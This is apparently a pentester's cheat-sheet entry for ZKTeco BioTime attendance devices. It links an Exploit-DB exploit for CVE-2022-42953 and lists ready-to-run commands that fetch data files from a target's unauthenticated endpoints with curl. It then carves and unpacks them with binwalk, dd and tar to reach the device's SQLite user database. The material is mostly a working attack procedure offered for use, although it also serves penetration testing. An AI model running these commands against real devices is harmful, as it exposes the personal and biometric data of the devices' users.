ZKTeco BioTime

Resources

A curated list of essential reading from leading security researchers.

• Exploitation
  • CVE-2022-42953 : https://www.exploit-db.com/exploits/51112

Commands

• CVE-2022-42953
  • Recon

    curl http://10.10.100.148/form/DataApp?style=1 --output device.dat
    curl http://10.10.100.148/form/DataApp?style=0 --output data.dat
    curl http://10.10.100.148/csl/user?did=0&uid=123

    • data.dat & device.dat

      file data.dat
      binwalk data.dat # gzip compressed (get the Decimal number )
      dd if=data.dat bs=1 skip=3104 | gunzip > data.uncompressed # skip the gzip headers 
      file data.uncompressed
      tar -xvf data.uncompressed
      sqlitebrowser ZKDB.db